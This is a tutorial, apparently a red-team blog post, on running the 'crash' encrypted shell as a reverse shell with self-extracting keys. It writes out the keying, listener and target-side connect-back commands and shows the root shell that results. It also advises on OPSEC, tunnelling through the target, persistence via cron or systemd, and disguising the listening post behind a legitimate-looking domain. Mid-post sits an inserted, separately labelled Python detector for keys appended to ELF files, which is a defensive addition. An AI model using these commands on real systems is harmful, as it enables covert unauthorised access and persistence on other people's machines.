Using Crash in backconnect mode with self-extraction.
So you have built 'crashd' statically, as per a previous post.
You have ensured no OPSEC-breaking strings are present. You have made your keys. You have your listening post server set up (we will discuss more advanced LP setups later).
You have read the manual, but maybe you are a bit confused about making it work in reverse-shell mode with self-extraction. I certainly was. Because I am bad at reading.
Your first step is to key your crashd binary. Append the server keys to the crashd binary with cat, then ship it over to your target system. The order matters here.
cat serverkey.priv>>crashd
cat serverkey.pub>>crashd
cat authkey.pub>>crashd
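Self-extraction works because the keys sit as plain PEM text past the end of the ELF image, which is also exactly what a file scanner on the defending side can look for. As an added example (not part of this post or of crash itself), the Python below parses the ELF64 header, works out where the image proper should end, and lists any PEM blocks appended after it; the sample binary and the key bodies are constructed placeholders, not real keys.

```python
import re
import struct

ELF_MAGIC = b"\x7fELF"
SHT_NOBITS = 8  # sections such as .bss occupy no bytes in the file
PEM_HEADER = re.compile(rb"-----BEGIN ([A-Z ]+)-----")


def elf64_payload_end(blob: bytes) -> int:
    """Offset where a well-formed ELF64 image should end: the end of the
    section header table or of the last file-backed section, whichever is
    larger. Any bytes after that were appended by something else."""
    if blob[:4] != ELF_MAGIC or blob[4] != 2:
        raise ValueError("not an ELF64 image")
    # Elf64_Ehdr: ident, type, machine, version, entry, phoff, shoff,
    # flags, ehsize, phentsize, phnum, shentsize, shnum, shstrndx
    (_, _, _, _, _, _, shoff, _, _, _, _, shentsize, shnum, _) = struct.unpack_from(
        "<16sHHIQQQIHHHHHH", blob, 0)
    end = shoff + shnum * shentsize
    for i in range(shnum):
        # Elf64_Shdr: name, type, flags, addr, offset, size, link, info, align, entsize
        _, sh_type, _, _, sh_off, sh_size, _, _, _, _ = struct.unpack_from(
            "<IIQQQQIIQQ", blob, shoff + i * shentsize)
        if sh_type != SHT_NOBITS:
            end = max(end, sh_off + sh_size)
    return end


def appended_pem_labels(blob: bytes) -> list:
    """Labels of PEM blocks found after the ELF image proper, in file order."""
    trailing = blob[elf64_payload_end(blob):]
    return [m.decode() for m in PEM_HEADER.findall(trailing)]


# Constructed sample: a bare ELF64 header plus one empty section header
# (128 bytes), then three PEM blocks appended in the same order as the
# cat commands above. The base64 bodies are placeholders, not key material.
_ehdr = struct.pack("<16sHHIQQQIHHHHHH", b"\x7fELF\x02\x01\x01" + b"\0" * 9,
                    2, 62, 1, 0, 0, 64, 0, 64, 0, 0, 64, 1, 0)
_null_shdr = b"\0" * 64
_keys = (b"-----BEGIN PRIVATE KEY-----\nQ09OU1RSVUNURUQ=\n-----END PRIVATE KEY-----\n"
         b"-----BEGIN PUBLIC KEY-----\nQ09OU1RSVUNURUQ=\n-----END PUBLIC KEY-----\n"
         b"-----BEGIN PUBLIC KEY-----\nQ09OU1RSVUNURUQ=\n-----END PUBLIC KEY-----\n")
SAMPLE_KEYED_BINARY = _ehdr + _null_shdr + _keys
SAMPLE_CLEAN_BINARY = _ehdr + _null_shdr

if __name__ == "__main__":
    print(appended_pem_labels(SAMPLE_KEYED_BINARY))  # ['PRIVATE KEY', 'PUBLIC KEY', 'PUBLIC KEY']
```

Run it over a real keyed crashd by reading the file into `appended_pem_labels`; a clean build returns an empty list, while a keyed one reports the appended blocks in the order they were concatenated.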
You will want to set up your listener now. In this example we are not verifying server keys ("-K none" disables host-key checking), so be aware of that. The file "HK_127.0.0.1" can be passed to the "-K" argument instead; I just forgot to copy it to my LP at the time. Don't be me, don't make that error.
./crashc -v -K none -i authkey.priv -p 6969 -l root
You should see the prompt below. Enter your PEM pass phrase at the prompt, whack 'enter', and wait.
$ ./crashc -v -K none -i authkey.priv -p 6969 -l root
crypted admin shell (C) 2022 Sebastian Krahmer https://github.com/stealth/crash
crashc: starting crypted administration shell
crashc: connecting to :6969 ...
Enter PEM pass phrase:
Copy your crashd binary to the target system, and invoke it like so:
./crashd -A self -a -e -U -H YOUR-LISTEN-IP -p 6969
You should see something like the following on your listener once the shell lands.
crashc: Different versions. Some features might not work.
crashc: Cipher: TLS_AES_256_GCM_SHA384 TLSv1.3 Kx=any Au=any Enc=AESGCM(256) Mac=AEAD
crashc: Hostkey checking disabled!
# id;uname -a;pwd
uid=0(root) gid=0(root) groups=0(root)
Linux debian 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux
/root
# exit
crashc: closing connection.
That is it. You have your shell. Have a play with the port forwarding and SOCKS proxy options for tunnelling through the target.
When invoked in this mode, crashd does not daemonize and reconnect (it only forks to the background), so if you close the shell you need to re-exec it on the target. A nice-to-have would be for it to retry the connection back at a set interval.
You can always add it to cron, or use a systemd timer or similar to bring your own persistence. I've been threatening to write a series of notes trying to exhaustively document every place you can persist on Linux for a while now, so I will have to get around to doing that.
crash apparently supports SNI proxying, using something like sshttpd, which I think could be a very neat way to hide your LP behind a legitimate-looking website with a well-categorised, aged domain.
I am just unclear as yet how to make this work in reverse-connecting mode, so I'll have to look into that soon and see if I can document it.